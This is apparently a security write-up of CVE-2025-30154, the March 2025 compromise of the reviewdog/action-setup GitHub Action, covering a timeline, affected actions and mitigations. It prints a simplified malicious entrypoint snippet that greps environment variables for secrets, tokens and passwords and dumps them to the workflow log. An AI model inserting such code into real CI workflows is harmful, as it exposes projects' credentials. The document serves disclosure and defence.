---

On March 11, 2025, a critical security incident struck the open source developer world: the popular reviewdog/action-setup GitHub Action was compromised, putting secrets and workflows of thousands of projects at risk. Labeled CVE-2025-30154, the breach involved malicious code designed to exfiltrate GitHub Actions secrets, highlighting the dangers of supply chain attacks in CI/CD pipelines.

In this post, we break down exactly what happened, how the code worked, who is affected (hint: it’s much more than reviewdog/action-setup), and what you must do to secure your projects.


## What is reviewdog/action-setup?

reviewdog/action-setup is an official GitHub Action for installing reviewdog, a code review tool used for automated feedback on code quality, style, lint, and more. Many development teams integrate reviewdog into their workflow for consistent automated checks during pull requests.

Usage is often as simple as

- uses: reviewdog/action-setup@v1

Timeline of the Attack

- March 11, 2025, 18:42 UTC: The official reviewdog/action-setup@v1 branch was updated to include malicious code.

March 11, 2025, 20:31 UTC: The compromise was detected and the malicious commit was reverted.

Projects running CI/CD workflows within this window, using reviewdog/action-setup@v1, are at risk.

Attack Details: What Did the Malicious Code Do?

The attacker modified the action’s entrypoint script to upload any available workflow secrets to the workflow log. In CI environments like GitHub Actions, logs are often accessible to anyone with repository access, making this type of attack especially dangerous.

The snippet below (simplified for clarity) was added to the action's entrypoint.sh

# Malicious code added by attacker
echo "[!!!] Dumping secrets..." >> "${GITHUB_WORKSPACE}/secrets_dump.txt"
env | grep -i 'secret\|token\|password' >> "${GITHUB_WORKSPACE}/secrets_dump.txt"
cat "${GITHUB_WORKSPACE}/secrets_dump.txt"

# ...rest of legitimate setup logic

This logs all environment variables containing strings like SECRET, TOKEN, or PASSWORD – commonly how workflow secrets are named.

Result: Any AWS keys, NPM tokens, or other sensitive variables injected into the workflow would be printed to the workflow log, exposing them to attackers or anyone reviewing logs.

Which Actions Are Affected?

It’s not just reviewdog/action-setup that’s impacted. Several* other popular reviewdog actions depend on reviewdog/action-setup@v1 and thus were instantly compromised during this window:<br><br>- reviewdog/action-shellcheck<br>- reviewdog/action-composite-template<br>- reviewdog/action-staticcheck<br>- reviewdog/action-ast-grep<br>- reviewdog/action-typos<br><br>Crucially:** The compromise affects *any version or pinning method* that references reviewdog/action-setup@v1 within the affected time, even if you used SHA pinning or tags.

Did those workflows run during the window?

If YES:
Review your GitHub Actions logs during that time. Look for any lines with “secrets_dump.txt,” “Dumping secrets…”, or environment variables printed in plain text. Assume any secrets present in your workflow at the time have been compromised.

References, Validation, and Further Reading

- Official Security Advisory for reviewdog/action-setup
- Original reviewdog/action-setup repository
- GitHub Blog: Supply Chain Attacks in Actions
- CVE Database Entry for CVE-2025-30154 *(pending publication)*

Mitigations and Recommendations

1. Revoke / rotate all secrets used in affected workflows. This is critical. Any secret (API keys, tokens, etc.) that may have been exposed should be replaced immediately.

Audit your GitHub workflows for references to the listed reviewdog actions.

3. Switch to safer pinning: Avoid untrusted, mutable tags such as @v1. Pin by commit SHA when possible, but remember this doesn’t help if a dependency itself references a mutable tag.
4. Monitor workflow logs: Regularly review workflow logs for suspicious activity or unexpected environment dumps.

Key Takeaways

- This supply chain attack underscores the critical importance of securing CI/CD pipelines and regularly reviewing third-party actions.
- The mutable nature of GitHub Action tags like @v1 can make even careful pinning strategies vulnerable in the presence of transitive dependencies.
- Anyone using reviewdog GitHub actions *during the affected window* should consider all secrets compromised.

Stay vigilant and keep your CI/CD supply chain secure!

*If you found this research helpful, consider reviewing your own projects and sharing this warning within your developer communities.*


*This is an exclusive, in-depth breakdown of CVE-2025-30154 for the developer and open-source security community.*

Timeline

Published on: 03/19/2025 16:15:33 UTC
Last modified on: 03/25/2025 01:00:02 UTC